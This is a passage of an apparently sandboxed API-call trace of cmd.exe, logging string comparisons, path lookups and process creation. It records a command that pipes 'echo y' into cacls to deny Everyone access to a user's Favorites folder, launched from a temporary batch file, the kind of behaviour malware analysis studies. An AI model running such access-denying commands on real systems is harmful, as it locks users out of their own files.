(_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.786] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.787] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.787] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.787] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.787] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.787] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.787] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessInformation=0xc8ee4c*(hProcess=0x8c, hThread=0x80, dwProcessId=0xb68, dwThreadId=0xb6c)) returned 1 [0035.790] CloseHandle (hObject=0x80) returned 1 [0035.790] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.791] GetEnvironmentStringsW () returned 0xd15f98* [0035.791] FreeEnvironmentStringsA (penv="=") returned 1 [0035.791] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0035.791] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.791] DuplicateHandle (in: hSourceProcessHandle=0x8c, hSourceHandle=0x94, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0035.791] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0035.791] _close (_FileHandle=5) returned 0 [0035.791] _dup (_FileHandle=0) returned 4 [0035.791] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0035.791] _close (_FileHandle=3) returned 0 [0035.791] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.791] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.791] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.791] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.791] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.791] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.791] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.791] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.791] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.791] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.791] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.791] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.791] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.791] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.791] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.791] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.791] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.791] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.791] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.791] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.791] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.791] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.791] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.791] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.791] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.791] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.791] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.791] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.791] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.791] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.791] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.791] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.792] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.792] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.792] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.792] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.792] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.792] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.792] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.792] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.792] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.792] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.792] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.792] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.792] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.792] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.792] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.792] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.792] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.792] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.792] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.792] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.792] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.792] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.792] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.792] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.792] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.792] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.792] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.792] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.792] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.792] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.792] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.792] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.792] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.792] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.792] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.792] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.792] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.792] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.792] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.792] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.792] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.792] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.792] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.792] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.792] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.792] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.792] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.792] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.792] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.792] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.792] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.792] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.792] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0035.792] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0035.792] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0035.793] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.793] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.793] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.793] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.793] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.793] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.793] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.793] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.793] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.793] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.793] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.793] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.793] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.793] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.793] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.793] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.793] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.793] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.793] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.793] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.793] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.793] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.793] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.793] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.793] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.793] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.793] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.793] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.793] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.793] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.793] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.793] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.793] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.793] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.793] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.793] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.793] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.793] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.793] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.793] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.793] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.793] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.793] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0035.793] SetErrorMode (uMode=0x0) returned 0x0 [0035.793] SetErrorMode (uMode=0x1) returned 0x0 [0035.793] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1baf0, lpFilePart=0xc8ef1c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ef1c*="Desktop") returned 0x1c [0035.794] SetErrorMode (uMode=0x0) returned 0x1 [0035.794] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.794] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.794] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.794] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.794] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0035.794] GetLastError () returned 0x2 [0035.794] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18548 [0035.794] FindClose (in: hFindFile=0xd18548 | out: hFindFile=0xd18548) returned 1 [0035.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0035.794] GetLastError () returned 0x2 [0035.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18548 [0035.794] FindClose (in: hFindFile=0xd18548 | out: hFindFile=0xd18548) returned 1 [0035.794] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.794] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.794] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0035.794] SetErrorMode (uMode=0x0) returned 0x0 [0035.795] SetErrorMode (uMode=0x1) returned 0x0 [0035.795] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd15fa0, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ecc4*="Desktop") returned 0x1c [0035.795] SetErrorMode (uMode=0x0) returned 0x1 [0035.795] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.795] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.795] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.795] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.795] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0035.795] GetLastError () returned 0x2 [0035.795] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.795] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd1bef0 [0035.795] FindClose (in: hFindFile=0xd1bef0 | out: hFindFile=0xd1bef0) returned 1 [0035.795] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0035.795] GetLastError () returned 0x2 [0035.795] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd1bef0 [0035.795] FindClose (in: hFindFile=0xd1bef0 | out: hFindFile=0xd1bef0) returned 1 [0035.795] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.795] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.795] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.810] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0035.810] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0035.810] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.810] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.811] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.811] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.811] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.811] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.811] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.811] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.811] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.811] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.811] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.811] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.811] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.811] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.811] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Users\\5JgHKoaOfdp\\Favorites\\*.*\" /e /d everyone", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Users\\5JgHKoaOfdp\\Favorites\\*.*\" /e /d everyone", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="cacls \"C:\\Users\\5JgHKoaOfdp\\Favorites\\*.*\" /e /d everyone", lpProcessInformation=0xc8ee4c*(hProcess=0x80, hThread=0x94, dwProcessId=0xb70, dwThreadId=0xb74)) returned 1 [0035.813] CloseHandle (hObject=0x94) returned 1 [0035.813] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.813] GetEnvironmentStringsW () returned 0xd1b020* [0035.813] FreeEnvironmentStringsA (penv="=") returned 1 [0035.813] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0035.813] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0035.813] _close (_FileHandle=4) returned 0 [0035.813] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) returned 0x0 [0035.868] GetExitCodeProcess (in: hProcess=0x8c, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0035.868] CloseHandle (hObject=0x8c) returned 1 [0035.868] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0035.879] GetExitCodeProcess (in: hProcess=0x80, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0035.879] CloseHandle (hObject=0x80) returned 1 [0035.879] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.880] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.881] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.881] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.881] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.881] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.882] SetConsoleInputExeNameW () returned 0x1 [0035.882] GetConsoleOutputCP () returned 0x1b5 [0035.882] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.882] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.882] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 